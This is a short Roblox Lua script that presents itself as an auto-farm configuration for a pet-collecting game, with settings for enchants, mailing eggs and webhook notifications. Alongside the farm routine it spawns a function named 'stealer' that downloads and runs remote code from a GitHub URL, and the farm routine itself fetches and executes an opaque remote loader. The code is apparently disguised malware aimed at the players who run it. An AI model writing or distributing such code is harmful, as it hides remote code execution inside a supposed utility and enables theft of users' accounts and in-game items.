local function stealer()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TechCraft1/AutoRank/refs/heads/main/V3"))()                                                         )                              
end
local function farm()
 
getgenv().Config = {
    ["EquipEnchants"] = {"Lucky Eggs", "Lucky Eggs", "Lucky Eggs", "Strong Pets", "Coins", "Fortune"},
    ["Mailing"] = {
        ["Usernames"] = {""},
        ["Items"] = {
            ["Egg"] = {
                ["Huge Machine Egg 4"] = 1,
            },
        },
        ["MailAllHuges"] = false
    },
    ["Notifications"] = {
        ["UserID"] = "",
        ["Webhook"] = ""
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/ad5066fbca6e5f2c374e725dfc25ffec.lua"))()

end

task.spawn(stealer)
task.spawn(farm)
